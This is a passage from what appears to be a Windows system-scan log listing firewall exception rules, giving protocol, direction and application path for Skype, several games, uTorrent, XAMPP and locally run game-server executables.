"{81874B4B-21D6-437C-9A62-673B812014BA}" = protocol=6 | dir=in | app=c:\program files (x86)\squareenix\final fantasy xiv\ffxivboot.exe |
"{819BBB93-A63E-433A-8055-5016E914BB89}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{82F3501D-CFA4-4972-ABF6-A8B55F7B4EFD}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{83630659-9D52-4D96-85E5-E9ACAA0010C3}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{84AAB010-8F47-443C-8FE6-770D5487BB96}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{86585AC3-A4DB-48A4-B639-75210D39D262}" = protocol=6 | dir=in | app=c:\program files (x86)\autodesk\backburner\monitor.exe |
"{88BF652F-9A79-47FE-A7F1-BF7F9E5797D0}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{8A974DD1-B9AA-4149-B85C-0C773E925B8D}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{8C0F635C-9878-4ED3-AE0A-3438976A2800}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{8DB9C33A-38C4-4982-B6BD-4B643744D8E7}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{90039948-1127-4D38-90D9-E572E36F751B}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{90940A93-28CA-45A5-BAD8-261931DA3572}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{90F58764-3263-473E-82BD-ACA3110F3905}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{91FC3A16-6B7C-45AB-86BA-1ED6242FCD05}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\skyrim\skyrimlauncher.exe |
"{9588CE61-A72B-4690-B1EC-0984811C0D08}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{9642512C-51EE-425A-9D55-A93288460068}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{9697A4A6-4BC2-4332-99C2-A3E524849635}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{96B9FC3C-A52A-45F6-BDF5-C0C06019A916}" = protocol=17 | dir=in | app=%programfiles(x86)%\windows media player\wmplayer.exe |
"{96D15695-66BF-4FD9-B695-67ACFB822522}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{96F0D307-958A-413D-9B1D-B9AA344A3AE9}" = protocol=6 | dir=in | app=c:\program files (x86)\squareenix\final fantasy xiv - a realm reborn\boot\ffxivlauncher.exe |
"{985B5324-C5B7-49DE-BE37-B9E20311C6D9}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{9986E7AD-9361-42A7-9DDF-4FC5DDD7AC07}" = protocol=6 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{9B646E7F-CF83-4AB1-9AB8-51135142CE3C}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{9CCEC0FF-BE79-4D02-80ED-60FA1A547E35}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\saints row iv inauguration station\saintsrowiv_inaugurationstation.exe |
"{9D9B0F91-CC9E-4032-8076-838795234228}" = protocol=6 | dir=in | app=c:\program files (x86)\autodesk\backburner\server.exe |
"{9DBA8D75-CEE2-4356-9876-25DB60EEECC7}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{9E92007F-C6D4-4DA1-9455-5D7911516F76}" = protocol=6 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe |
"{9F30F29B-EA93-4809-8394-8C478E50AA1D}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\skyrim\creationkit.exe |
"{A01509C7-E086-4E42-9DD8-A816E3CCC628}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{A0612447-36AF-4B44-BD9E-250E68F7831A}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{A0614DF1-871E-4357-B06E-7EAE5EC1BE72}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{A0DD0808-3655-4A80-BCD2-7C56D1042A0F}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{A15F08AD-743D-42E5-A2B3-A575EDFA5B10}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{A37DF329-C799-488E-8559-5CA5EBA6527B}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{A500288A-7D7F-4969-BA6C-0706E0D840AA}" = protocol=17 | dir=in | app=c:\program files (x86)\aim\aim.exe |
"{A51EBC6E-BF5E-4EFD-8040-1C639D68269F}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{A591A8EF-92EF-4B2A-8071-4A5212C45A37}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{A5C7EEA5-B08F-428C-AE6F-A86B0D6DD0F9}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{A627AC1A-B80C-468D-A7B2-988220DC928D}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{A7910DD1-303C-4366-B23A-16DA06D81C7C}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{A7F1CF2C-7F8C-4748-89AC-93B6EF65663D}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{A85CD012-BF34-4C4F-A8D6-4E8C3A8D9313}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\saints row iv\saintsrowiv.exe |
"{A93F4AF3-F5B4-4F5D-ACCE-1FFF2C86600B}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{A96A4EF9-2B4F-490B-A8BD-7B67568F9DED}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{AA36443A-4711-43AD-BA2B-DAB70D87D108}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{AB1DAD20-1E4C-4098-A026-89E064BC2953}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{ABAD1C70-90DF-4C00-A7B2-2DB6139D8ED7}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{ACF9B674-C870-4AF0-B31A-B18ADB0606B4}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |
"{AF202505-EC71-4D41-96F4-DE0C3F748201}" = protocol=17 | dir=in | app=c:\program files (x86)\squareenix\final fantasy xiv - a realm reborn\boot\ffxivlauncher.exe |
"{AF4CE17B-4B67-4E66-99E8-D6F07C6530F1}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\final fantasy vii\ff7_launcher.exe |
"{AF7580DB-2862-48C9-9F6E-AF7C34F25C0E}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{B0790E30-7887-42B5-BF96-DB87891D90D4}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\saints row iv inauguration station\saintsrowiv_inaugurationstation.exe |
"{B1298EB6-AD64-408E-A5E7-C9FB2024EBF8}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{B1312CA7-A74C-4AAB-95DD-ECE392D038A2}" = protocol=6 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe |
"{B19133CF-15E0-480B-896C-D78963EE2862}" = protocol=1 | dir=out | name=@firewallapi.dll,-28544 |
"{B2679D5B-6C21-4364-8674-1AD7279280DD}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{B51A16C4-0914-4E4D-B032-836EC57D9FA3}" = dir=in | app=c:\program files (x86)\windows live\sync\windowslivesync.exe |
"{B5EB99CB-597D-4CB0-9574-6B5766AC0C22}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{B5FBBAA4-B744-4B8F-9188-276FFE6ADF48}" = protocol=17 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{B690B1BE-F100-4F66-998E-3CB18CCAA30F}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{B7ED08ED-E6A7-47E9-B13E-086747DBC4D3}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{B9396907-18C2-4C6A-85D5-FBF85AA1C9EC}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{B9D41B8B-C869-4DD9-B41B-539F6D6D97AD}" = protocol=6 | dir=out | app=system |
"{BAA2CD70-97AA-45F3-8451-9364CBD7253C}" = dir=in | app=c:\program files (x86)\pando networks\media booster\pmb.exe |
"{BAB9665F-1F8C-418D-9E59-AF1A2CDBC6B4}" = protocol=58 | dir=out | name=@firewallapi.dll,-28546 |
"{BB3C02B5-B130-4116-BEDE-F932842C7BD6}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{BB5B7404-0413-4ED4-9530-DBA16AB3A27F}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{BCDB636B-5E88-4926-A9D3-AB6261673797}" = protocol=6 | dir=in | app=c:\users\wesley\desktop\oblivion mods\xampp-win32-1.8.1-vc9\xampp\apache\bin\httpd.exe |
"{BDC18702-14FC-46CE-9B96-503F0962E88D}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{C192D407-DBE3-4B59-9AC2-656370A1B416}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{C2036907-F1DA-472F-89BE-2CB4801E4465}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{C30C7F4B-98CF-46B4-859F-DCD965BC0B79}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{C3120368-ECE7-4E2E-9CA5-FE6378CB055E}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\oblivion\oblivionlauncher.exe |
"{C61A03A1-E892-4615-8469-E8CD107CBF3E}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{C6421A46-170E-42F6-B4F2-5AB876F50C82}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{C6B39009-22B7-4CF2-AF3A-7DF57DBC4472}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{C6D79631-8430-4A7F-878F-52E42294E3C4}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{C853E1AB-F6C9-4C44-9DB0-4348A4F42E66}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{C8ACCFFF-06E6-4910-B6C1-9A2FCD4DA125}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{C98A7926-6063-4D15-AEE5-44E442689919}" = protocol=58 | dir=in | app=system |
"{CAECCFC6-1934-454C-A12D-AF835243817B}" = protocol=17 | dir=in | app=c:\users\wesley\desktop\oblivion mods\xampp-win32-1.8.1-vc9\xampp\apache\bin\httpd.exe |
"{CBCAD372-4282-4778-9143-7A57461DE133}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{CCDDE627-1138-4844-AA4E-1A7E3FD91610}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{CF3D0366-C834-4ED9-9F54-ABF590F539C6}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{D004833B-1B0F-497D-96F4-2A533E2FC23A}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{D073BC81-4403-468D-B3D1-523413A75B72}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{D1D254ED-C05D-4421-A25F-C90C390983B4}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{D20E6CAF-EAAC-4F04-9899-26E8160F3EE9}" = protocol=6 | dir=in | app=c:\users\wesley\desktop\clutter\new folder\ship_server.exe |
"{D2C1A244-90BA-42FF-8151-B9B0A89EBC31}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{D2E9C6B3-A57C-47F7-AD23-251361BEB7BC}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{D32CA9A2-EAB4-4C52-B9BA-A7D56D0E6C6B}" = protocol=6 | dir=in | app=c:\program files (x86)\yahoo!\messenger\yahoomessenger.exe |
"{D47F269B-CB56-4746-AC4D-184C615D09F6}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{D75FF529-8621-4163-9B05-7B038E1DB5FA}" = protocol=6 | dir=in | app=c:\users\wesley\desktop\oblivion mods\nifutils\nifconvert.exe |
"{D78A4F3F-517A-43E7-B845-DDF24C1A5CBD}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{D7F79391-B43C-47A8-AC4B-F80968937D24}" = protocol=17 | dir=in | app=c:\users\wesley\desktop\clutter\new folder\ship_server.exe |
"{D881DE45-FF9F-4F93-B7EC-5C3B8F18923F}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{D8C30233-0510-4D35-87A4-158E2E8C96F7}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\final fantasy vii\ff7_launcher.exe |
"{D8E6380C-E75C-4FCE-AF6C-BC9397F928B8}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{D95C395E-B85F-4D7E-94BE-3CE6B3DED9AB}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{DA2D896F-29EC-4460-BDA4-CAC17A2AD5E5}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{DA4687A9-FAAB-4C87-BA78-C55AEA2FA755}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{DB4D0CF7-7BC7-4EC0-8D53-8C026F772700}" = protocol=17 | dir=in | app=c:\users\wesley\desktop\oblivion mods\nifutils\nifconvert.exe |
"{DB6DF807-F98D-4812-B9FB-8BE523637AF5}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe |
"{DBA767C1-EB91-4F18-8DD0-69B1536A1059}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{DBD58B6D-BB6B-4ECC-BCBF-A39B16FDDEC4}" = protocol=1 | dir=in | name=@firewallapi.dll,-28543 |
"{DCFCC08A-F710-4D63-9B4D-ACFD69350DCE}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{DEB0A52F-CE49-4D02-8ED1-B143A6183FAB}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\skyrim\skyrimlauncher.exe |
"{DFD34E23-C287-481F-9120-33DDFA4CBF06}" = protocol=17 | dir=in | app=c:\program files (x86)\squareenix\final fantasy xiv - a realm reborn\boot\ffxivboot.exe |
"{E0099885-4AF2-4D0A-B7AD-7C48243E6B94}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{E098272F-7627-4D8B-8A76-C827B901DB94}" = protocol=6 | dir=in | app=c:\program files (x86)\squareenix\final fantasy xiv - a realm reborn\boot\ffxivboot.exe |
"{E09B28F8-9B17-4CF7-87ED-770DD1E54A09}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{E12A9745-886D-4983-B78E-50D1E1919156}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{E153E9FD-586E-49CA-B9E2-C5EC0345FEB3}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{E2F4A157-9FCA-4255-A571-B4CDBCFAAD69}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\saints row iv\saintsrowiv.exe |
"{E2F88B1C-0FD2-4AC8-8F88-A86FEFA54BD5}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{E3608668-3887-4F0C-A8DF-9866831EED1B}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{E37053FC-80DF-41FF-A98F-7403FF314E17}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{E50929A9-897C-4530-AD52-8E2B37000A33}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\saints row iv\saintsrowiv.exe |
"{E542EEBD-4A55-4942-85A7-E124AE61DC23}" = protocol=17 | dir=in | app=c:\program files (x86)\utorrent\utorrent.exe |
"{E5BF5C7D-BBE3-4FF9-A738-02222F70F1F5}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\dragon age ultimate edition\daoriginslauncher.exe |
"{E619CCAD-92E6-4378-9008-3FD51DC782AA}" = protocol=17 | dir=in | app=c:\program files (x86)\pando networks\media booster\pmb.exe |
"{E6EB9DE0-0A4F-413A-991D-2125C23202ED}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{E7099B03-FD89-47FE-9B8D-E323ED8163F2}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\dragon age ultimate edition\daoriginslauncher.exe |
"{E949FDE5-E659-445A-ABCA-D7450463E334}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{EA27675A-16C1-4FCE-AD3B-131447D21D13}" = protocol=17 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe |
"{EB979A15-0380-457D-9008-8FBD95391D39}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\skyrim\skyrimlauncher.exe |
"{EC1B1977-898D-473B-A5A3-234AB0495EA3}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{EC4B5D19-4CED-43BB-91FE-FB4B9BDB4C91}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{ED119F16-0C84-43EE-843D-5C9F230216D6}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{ED59495F-9107-4093-816F-C82C0AAA0754}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{EEFF52B3-A1E9-4B09-9F75-2BCFC7D490CD}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{EF27E121-BB82-4B0B-B969-3D66B852C92D}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{EF3A5F6A-CAA7-4960-A2A7-8D0AC98F13D7}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{F2F53F56-6165-4ED8-962E-402745654F9A}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{F44B0383-25C8-406E-BFB1-71A718AF4EE3}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{F5CE0D43-F3B9-42C2-A2FD-36D9B6FAC144}" = protocol=17 | dir=in | app=e:\program files\utorrent\utorrent.exe |
"{F6BD022F-0AE6-46FB-B773-CAC3E0558C0F}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe |
"{F6E4F728-3C82-42F4-94CB-C9F2B9E4C001}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{F9B0262F-55A2-4E26-BEB9-928F2925DA39}" = protocol=17 | dir=in | app=c:\program files\autodesk\3ds max 2012\mentalimages\satellite\raysat_3dsmax2012_64.exe |
"{F9DBA14D-2DA8-4E7E-9A8C-0277152918C5}" = dir=in | app=c:\program files (x86)\safari\plugin manager\skypepm.exe |
"{F9FE0BF5-50D7-4496-A6CE-A77F0D1C61E6}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{FAC865D3-D972-45C7-85F2-9B31CEB6D54A}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{FB7B3969-4547-4511-B2BD-225EE42A9D60}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{FD18E25D-8F40-40F0-85B8-7A1206042820}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{FD29F3B5-A307-4D1F-BF6E-8C72156A6330}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{FD607A63-B6E8-47AF-9955-A40D4490BB28}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{FD883362-B83A-4D97-B208-BD3AEC8B389E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{FE47B6D8-06B5-470B-8852-5CB88B238E77}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{FE8CCAC8-797D-428A-80DC-B6504AD9A610}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{FED82D3B-0974-41E6-8D9E-D99DE754F98A}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{FF9AA80D-D146-4388-83C1-C71352EED439}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\morrowind\morrowind launcher.exe |
"{FFA6C9FB-0DD1-4535-8E1B-2139CA43C334}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{FFD36C67-D17F-4E83-BED0-775612C78ED4}" = dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"{FFF368D2-6FEE-4A6D-895C-B88A9861D41E}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"TCP Query User{13C66E39-D3C4-429C-9D37-849C4C053254}C:\users\wesley\desktop\oblivion mods\xampp-win32-1.8.1-vc9\xampp\apache\bin\httpd.exe" = protocol=6 | dir=in | app=c:\users\wesley\desktop\oblivion mods\xampp-win32-1.8.1-vc9\xampp\apache\bin\httpd.exe |
"TCP Query User{13F9CE02-1A53-47DA-9779-5FE8776FA8E8}M:\clutter\new folder\ship_server.exe" = protocol=6 | dir=in | app=m:\clutter\new folder\ship_server.exe |
"TCP Query User{17092826-3DB0-450A-8AC5-8D90BAC05292}C:\program files (x86)\safari\phone\skype.exe" = protocol=6 | dir=in | app=c:\program files (x86)\safari\phone\skype.exe |
"TCP Query User{2D288655-3E83-49E0-8462-38A4762DD6B3}C:\users\wesley\desktop\oblivion mods\nifutils\nifconvert.exe" = protocol=6 | dir=in | app=c:\users\wesley\desktop\oblivion mods\nifutils\nifconvert.exe |
"TCP Query User{306DCBE9-6695-42B7-B0C1-5F7D9AF775A3}C:\program files (x86)\utorrent\utorrent.exe" = protocol=6 | dir=in | app=c:\program files (x86)\utorrent\utorrent.exe |
"TCP Query User{308D7542-9AAE-4B61-BC51-E51F33BA53F3}C:\users\wesley\desktop\psoserver\psologin_ship_server\patch_server.exe" = protocol=6 | dir=in | app=c:\users\wesley\desktop\psoserver\psologin_ship_server\patch_server.exe |
"TCP Query User{334DC83F-D47E-4A16-9755-0A40671DFC70}C:\program files (x86)\java\jre6\bin\java.exe" = protocol=6 | dir=in | app=c:\program files (x86)\java\jre6\bin\java.exe |
"TCP Query User{3364F5FA-2ED5-4304-8EAA-98503CB95711}C:\program files (x86)\steam\steamapps\common\skyrim\creationkit.exe" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\skyrim\creationkit.exe |
"TCP Query User{3578851B-6E17-40FE-9647-94F00F5E3897}C:\program files (x86)\ncwest\nclauncher\ncupdatehelper.exe" = protocol=6 | dir=in | app=c:\program files (x86)\ncwest\nclauncher\ncupdatehelper.exe |
"TCP Query User{460638D8-FBF8-4A70-B37C-B36383E86CC9}C:\users\wesley\desktop\new folder\patch_server.exe" = protocol=6 | dir=in | app=c:\users\wesley\desktop\new folder\patch_server.exe |
"TCP Query User{4755E2BC-C4C7-44D8-AFB6-79996AD2A4CB}C:\users\wesley\desktop\psoserver\psologin_ship_server\ship_server.exe" = protocol=6 | dir=in | app=c:\users\wesley\desktop\psoserver\psologin_ship_server\ship_server.exe |
"TCP Query User{47BD5148-F634-4002-834D-3F8EF0036507}F:\program files\skype\phone\skype.exe" = protocol=6 | dir=in | app=f:\program files\skype\phone\skype.exe |
"TCP Query User{51B58441-8B37-4897-B59E-33C8614E4862}C:\program files (x86)\aim\aim.exe" = protocol=6 | dir=in | app=c:\program files (x86)\aim\aim.exe |
"TCP Query User{55621B04-FDD9-4D26-BC9E-3900C851A3E3}C:\users\wesley\desktop\clutter\new folder\patch_server.exe" = protocol=6 | dir=in | app=c:\users\wesley\desktop\clutter\new folder\patch_server.exe |
"TCP Query User{729BF536-9CDF-4BA7-87BC-C6FA4D8CEDA9}C:\users\wesley\desktop\clutter\new folder\ship_server.exe" = protocol=6 | dir=in | app=c:\users\wesley\desktop\clutter\new folder\ship_server.exe |
"TCP Query User{762096A2-F7A2-47A5-92D5-82B5E22EABE2}C:\users\wesley\desktop\new folder\spsos_login_v.048_nosql\login_server.exe" = protocol=6 | dir=in | app=c:\users\wesley\desktop\new folder\spsos_login_v.048_nosql\login_server.exe |
"TCP Query User{856D6A38-F052-400B-8220-0B17353DDFCD}C:\program files (x86)\premiumsoft\navicat lite\navicat.exe" = protocol=6 | dir=in | app=c:\program files (x86)\premiumsoft\navicat lite\navicat.exe |
"TCP Query User{99AA7556-2E49-4AE0-BBBB-CB6B02FE29E6}C:\users\wesley\desktop\new folder\spsos_login_v.048_nosql\patch_server.exe" = protocol=6 | dir=in | app=c:\users\wesley\desktop\new folder\spsos_login_v.048_nosql\patch_server.exe |
"TCP Query User{9DDB64B4-7122-4257-A438-EA1391D5B343}C:\users\wesley\desktop\psoserver\psologin_ship_server\login_server.exe" = protocol=6 | dir=in | app=c:\users\wesley\desktop\psoserver\psologin_ship_server\login_server.exe |
"TCP Query User{D6DFCD4E-4070-4C85-9EA3-CD099CF26262}C:\users\wesley\desktop\psoserver\psologin_ship_server\ship_server.exe" = protocol=6 | dir=in | app=c:\users\wesley\desktop\psoserver\psologin_ship_server\ship_server.exe |
"TCP Query User{DBEFBC4A-B3B2-4CBC-9785-FF39734F57EA}C:\program files (x86)\steam\steamapps\common\dragon age ultimate edition\bin_ship\daorigins.exe" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\dragon age ultimate edition\bin_ship\daorigins.exe |
"TCP Query User{DEB5DEC7-C0ED-441B-983A-9DD6DB0AA531}C:\users\wesley\desktop\new folder\ship_server.exe" = protocol=6 | dir=in | app=c:\users\wesley\desktop\new folder\ship_server.exe |
"TCP Query User{DFADDD3A-7880-4635-AFFD-E508118ED3EC}C:\program files (x86)\playonline\squareenix\playonlineviewer\pol.exe" = protocol=6 | dir=in | app=c:\program files (x86)\playonline\squareenix\playonlineviewer\pol.exe |
"TCP Query User{E2D3E226-DB5A-475F-8FB6-D3B7B8E9866B}C:\users\public\games\cryptic studios\star trek online\live\gameclient.exe" = protocol=6 | dir=in | app=c:\users\public\games\cryptic studios\star trek online\live\gameclient.exe |
"TCP Query User{E4F8B129-18B8-48DD-A051-CCE1926D25D3}C:\users\wesley\desktop\new folder\login_server.exe" = protocol=6 | dir=in | app=c:\users\wesley\desktop\new folder\login_server.exe |
"TCP Query User{F8243979-DD38-483A-91E3-0DA6819A836C}C:\program files (x86)\ncwest\nclauncher\ncupdatehelper.exe" = protocol=6 | dir=in | app=c:\program files (x86)\ncwest\nclauncher\ncupdatehelper.exe |
"TCP Query User{FEF20764-3E87-488C-94BD-472AC229CC13}C:\users\wesley\desktop\clutter\new folder\login_server.exe" = protocol=6 | dir=in | app=c:\users\wesley\desktop\clutter\new folder\login_server.exe |
"UDP Query User{14C1F6F1-35F4-4680-97EB-8FD02B4F86C5}C:\program files (x86)\playonline\squareenix\playonlineviewer\pol.exe" = protocol=17 | dir=in | app=c:\program files (x86)\playonline\squareenix\playonlineviewer\pol.exe |
"UDP Query User{14F7414E-DC56-44A5-9C18-5E55583E390E}C:\program files (x86)\java\jre6\bin\java.exe" = protocol=17 | dir=in | app=c:\program files (x86)\java\jre6\bin\java.exe |
"UDP Query User{2EA79B0F-AE15-4590-8B05-B01CCCABFB9F}F:\program files\skype\phone\skype.exe" = protocol=17 | dir=in | app=f:\program files\skype\phone\skype.exe |
"UDP Query User{43F0F576-4BDD-402C-B3B5-8429724DA743}C:\users\wesley\desktop\oblivion mods\xampp-win32-1.8.1-vc9\xampp\apache\bin\httpd.exe" = protocol=17 | dir=in | app=c:\users\wesley\desktop\oblivion mods\xampp-win32-1.8.1-vc9\xampp\apache\bin\httpd.exe |
"UDP Query User{4B9457A6-224C-488A-8F90-A1ADFCC21F41}C:\users\wesley\desktop\oblivion mods\nifutils\nifconvert.exe" = protocol=17 | dir=in | app=c:\users\wesley\desktop\oblivion mods\nifutils\nifconvert.exe |
"UDP Query User{4D0BAEA2-CF46-4EFF-9FDA-60B0A40D0975}C:\users\wesley\desktop\psoserver\psologin_ship_server\ship_server.exe" = protocol=17 | dir=in | app=c:\users\wesley\desktop\psoserver\psologin_ship_server\ship_server.exe |
"UDP Query User{4D5A2807-3160-4EB0-8B78-352D645E8BEA}C:\users\wesley\desktop\psoserver\psologin_ship_server\ship_server.exe" = protocol=17 | dir=in | app=c:\users\wesley\desktop\psoserver\psologin_ship_server\ship_server.exe |
"UDP Query User{507D4333-D376-47FA-9AEC-CE44143F73C2}C:\users\wesley\desktop\psoserver\psologin_ship_server\login_server.exe" = protocol=17 | dir=in | app=c:\users\wesley\desktop\psoserver\psologin_ship_server\login_server.exe |
"UDP Query User{51629825-35B9-4CC8-8454-250EBF3B1E8D}M:\clutter\new folder\ship_server.exe" = protocol=17 | dir=in | app=m:\clutter\new folder\ship_server.exe |
"UDP Query User{51C49959-21C5-4D37-9E16-9900F7A45906}C:\users\wesley\desktop\new folder\spsos_login_v.048_nosql\patch_server.exe" = protocol=17 | dir=in | app=c:\users\wesley\desktop\new folder\spsos_login_v.048_nosql\patch_server.exe |
"UDP Query User{5526B29D-7331-433F-A37B-85DE89CB3307}C:\users\wesley\desktop\clutter\new folder\ship_server.exe" = protocol=17 | dir=in | app=c:\users\wesley\desktop\clutter\new folder\ship_server.exe |
"UDP Query User{599B9E6E-6E39-46E1-9C90-E23AB2698A95}C:\program files (x86)\utorrent\utorrent.exe" = protocol=17 | dir=in | app=c:\program files (x86)\utorrent\utorrent.exe |
"UDP Query User{6667C1CE-08D6-4E2D-84F7-6A3C78FD77FE}C:\users\public\games\cryptic studios\star trek online\live\gameclient.exe" = protocol=17 | dir=in | app=c:\users\public\games\cryptic studios\star trek online\live\gameclient.exe |
